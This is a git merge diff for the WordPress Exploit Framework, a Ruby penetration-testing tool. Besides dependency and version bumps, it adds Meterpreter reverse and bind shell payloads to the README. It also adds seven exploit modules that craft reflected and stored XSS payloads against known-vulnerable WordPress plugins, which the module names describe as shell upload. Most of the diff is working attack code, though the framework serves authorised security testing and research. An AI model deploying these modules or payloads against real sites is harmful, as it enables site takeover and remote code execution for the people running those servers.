Merge branch 'development'

Author: rastating

.ruby-version

@@ -1 +1 @@
-2.2.6
+2.4.1

.travis.yml

@@ -1,8 +1,7 @@
 language: ruby
 rvm:
-  - 2.2.6
-  - 2.3.3
-  - 2.4.0
+  - 2.3.4
+  - 2.4.1
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
 script: bundle exec rspec

Gemfile

@@ -1,7 +1,7 @@
 source 'https://rubygems.org'
 gem 'colorize', '>=0.8.1'
 gem 'mime-types', '>=3.1'
-gem 'nokogiri', '~>1.7.0'
+gem 'nokogiri', '~>1.8.0'
 gem 'require_all', '~>1.4'
 gem 'rubyzip', '~>1.2'
 gem 'slop', '~>4.5'

README.md

@@ -4,7 +4,7 @@
 A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
 
 ### What do I need to run it?
-Ensure that you have Ruby >= 2.2.6 installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running ```bundle install```.
+Ensure that you have Ruby >= 2.4.1 installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running ```bundle install```.
 
 If bundler is not present on your system, you can install it by running ```gem install bundler```.
 
@@ -76,10 +76,12 @@ Exploit modules require you to specify a payload which subsequently gets execute
 * **bind_php:** uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
 * **custom:** uploads and executes a custom PHP script.
 * **download_exec:** downloads and runs a remote executable file.
+* **meterpreter_bind_tcp:** a Meterpreter bind TCP payload generated using msfvenom.
+* **meterpreter_reverse_tcp:** a Meterpreter reverse  TCP payload generated using msfvenom.
 * **exec:** runs a shell command on the remote server and returns the output to the WPXF session.
 * **reverse_tcp:** uploads a script that will establish a reverse TCP shell.
 
-All these payloads, with the exception of ```custom```, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
+All these payloads, with the exception of ```custom``` and the Meterpreter payloads, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
 
 ### How can I write my own modules and payloads?
 Guides on writing modules and payloads can be found on [The Wiki](https://github.com/rastating/wordpress-exploit-framework/wiki) and full documentation of the API can be found at http://www.getwpxf.com/.

VERSION

@@ -1 +1 @@
-1.5.3
+1.6

lib/wpxf/net/http_client.rb

@@ -125,7 +125,7 @@ def execute_request(opts)
           return Wpxf::Net::HttpResponse.new(res)
         end
 
-        emit_info "Requesting #{opts[:url]}...", true
+        emit_info "Requesting #{req.url}...", true
         req.run
       end
 
@@ -182,6 +182,17 @@ def execute_delete_request(opts)
       def max_http_concurrency
         normalized_option_value('max_http_concurrency')
       end
+
+      # Normalize a relative URI into an absolute URL.
+      # @param uri [String] the relative or absolute URI.
+      # @return [String] the absolute URL.
+      def normalize_relative_uri(uri)
+        if uri.start_with?('/')
+          normalize_uri(full_uri, uri)
+        else
+          uri
+        end
+      end
     end
   end
 end

lib/wpxf/net/typhoeus_helper.rb

@@ -37,7 +37,7 @@ def create_typhoeus_request(opts)
           opts[:body],
           headers
         )
-        Typhoeus::Request.new(opts[:url], options)
+        Typhoeus::Request.new(normalize_relative_uri(opts[:url]), options)
       end
     end
   end

lib/wpxf/utility/text.rb

@@ -57,6 +57,12 @@ def self.md5(value)
       def self.rand_email
         "#{rand_alpha(rand(5..10))}@#{rand_alpha(rand(5..10))}.com"
       end
+
+      # Generate a random month name.
+      # @return [String] the month name.
+      def self.rand_month
+        %w(january february march april june july august september october november december).sample
+      end
     end
   end
 end

modules/exploits/affiliatewp_reflected_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::AffiliateWPReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'AffiliateWP <= 2.0.9 Reflected XSS Shell Upload',
+      author: [
+        'DefenseCode',                    # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8835'],
+        ['URL', 'http://www.defensecode.com/advisories/DC-2017-05-005_WordPress_AffiliateWP_Plugin_Advisory.pdf']
+      ],
+      date: 'May 24 2017'
+    )
+  end
+
+  def check
+    :unknown
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_payload
+    url_encode("'</script><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=affiliate-wp-referrals&filter_from=#{url_payload}"
+  end
+end

modules/exploits/all_in_one_schema_rich_snippets_reflected_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::AllInOneSchemaRichSnippetsReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'All In One Schema.org Rich Snippets <= 1.4.4 Reflected XSS Shell Upload',
+      author: [
+        'DefenseCode',                    # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8834'],
+        ['URL', 'http://www.defensecode.com/advisories/DC-2017-01-002_WordPress_All_In_One_Schemaorg_Rich_Snippets_Plugin_Advisory.pdf']
+      ],
+      date: 'May 24 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('all-in-one-schemaorg-rich-snippets', '1.4.5')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_payload
+    url_encode("</script><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=rich_snippet_dashboard&bsf_force_send=true&bsf_send_label=#{url_payload}"
+  end
+end

modules/exploits/maxbuttons_reflected_xss_shell_upload.rb

@@ -0,0 +1,36 @@
+class Wpxf::Exploit::MaxbuttonsReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'MaxButtons <= 6.18 Reflected XSS Shell Upload',
+      author: [
+        'JPCert',                         # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['CVE', '2017-2169'],
+        ['WPVDB', '8831'],
+        ['URL', 'https://www.rastating.com/maxbuttons-6-18-reflected-xss']
+      ],
+      date: 'May 23 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('maxbuttons', '6.19')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=maxbuttons-controller')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'page' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
+    )
+  end
+end

modules/exploits/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb

@@ -0,0 +1,41 @@
+class Wpxf::Exploit::NewsletterBySupsysticCsrfStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Newsletter by Supsystic < 1.1.8 CSRF Stored XSS Shell Upload',
+      author: [
+        'King Coder',                     # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8832'],
+        ['URL', 'https://www.vulnerability-lab.com/get_content.php?id=2070']
+      ],
+      date: 'May 23 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('newsletter-by-supsystic', '1.1.8')
+  end
+
+  def vulnerable_url
+    wordpress_url_admin_ajax
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'action'  => 'create',
+      'label'   => "#{Utility::Text.rand_alpha(10)}<script src=\\\"#{xss_url}\\\"><\\/script>",
+      'slid[]'  => '1',
+      'oid'     => '1',
+      'mod'     => 'newsletters',
+      'pl'      => 'nbs',
+      'reqType' => 'ajax'
+    )
+  end
+end

modules/exploits/no_external_links_reflected_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::NoExternalLinksReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP No External Links <= 3.5.18 Reflected XSS Shell Upload',
+      author: [
+        'DefenseCode',                    # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8840'],
+        ['URL', 'http://defensecode.com/advisories/DC-2017-01-022_WordPress_No_External_Links_Plugin_Advisory.pdf']
+      ],
+      date: 'May 31 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-noexternallinks', '3.5.19')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php')
+  end
+
+  def url_payload
+    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=wp-noexternallinks%2Fwp-noexternallinks-options.php&action=stats&date1=#{url_payload}"
+  end
+end

modules/exploits/simple_slideshow_manager_reflected_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::SimpleSlideshowManagerReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Simple Slideshow Manager <= 2.3 Reflected XSS Shell Upload',
+      author: [
+        'DefenseCode',                    # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8841'],
+        ['URL', 'http://defensecode.com/advisories/DC-2017-02-016_WordPress_Simple_Slideshow_Manager_Plugin_Advisory.pdf']
+      ],
+      date: 'May 31 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('simple-slideshow-manager', 'readme.txt', '2.4')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_payload
+    url_encode("\"></script><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=Acurax-Slideshow-Add-Images&name=#{url_payload}"
+  end
+end

modules/exploits/spiffy_calendar_reflected_xss_shell_upload.rb

@@ -0,0 +1,47 @@
+class Wpxf::Exploit::SpiffyCalendarReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Spiffy Calendar <= 3.2.0 Reflected XSS Shell Upload',
+      author: [
+        'DTSA',                           # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8842'],
+        ['CVE', '2017-9420'],
+        ['URL', 'https://dtsa.eu/cve-2017-9420-wordpress-spiffy-calendar-v-3-2-0-reflected-cross-site-scripting-xss/']
+      ],
+      date: 'Jun 02 2017'
+    )
+
+    register_option(
+      StringOption.new(
+        name: 'calendar_path',
+        desc: 'The relative path or absolute URL of the calendar',
+        required: true
+      )
+    )
+  end
+
+  def check
+    readme = normalize_uri(wordpress_url_plugins, 'spiffy-calendar', 'readme.txt')
+    check_version_from_custom_file(readme, /=\sVersion\s((\d+\.?)+).+?=/, '3.3')
+  end
+
+  def vulnerable_url
+    normalize_relative_uri(datastore['calendar_path'])
+  end
+
+  def url_payload
+    url_encode("#{DateTime.now.year}\"><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?month=#{Utility::Text.rand_month[0..2]}&yr=#{url_payload}"
+  end
+end